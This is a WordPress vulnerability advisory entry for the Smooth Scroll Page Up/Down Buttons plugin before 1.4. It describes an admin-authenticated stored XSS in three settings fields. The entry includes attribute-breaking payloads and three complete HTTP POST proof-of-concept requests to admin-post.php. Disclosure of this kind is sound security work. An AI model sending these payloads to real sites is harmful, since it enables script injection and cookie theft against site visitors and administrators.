WordPress Plugin Vulnerabilities
Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS
Description
The plugin did not properly sanitise and validate its settings, such as psb_distance, psb_buttonsize, psb_speed, only validating them client side. This could allow high privilege users (such as admin) to set XSS payloads in them
Proof of Concept
### -- [ Payloads: ] [$] " autofocus=autofocus onfocus=alert(document.cookie); " [$] " autofocus=autofocus onfocus=alert(document.domain); " ### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13 ### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13 ### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-17 (about 3 years ago)
Added
2021-05-17 (about 3 years ago)
Last Updated
2021-05-18 (about 2 years ago)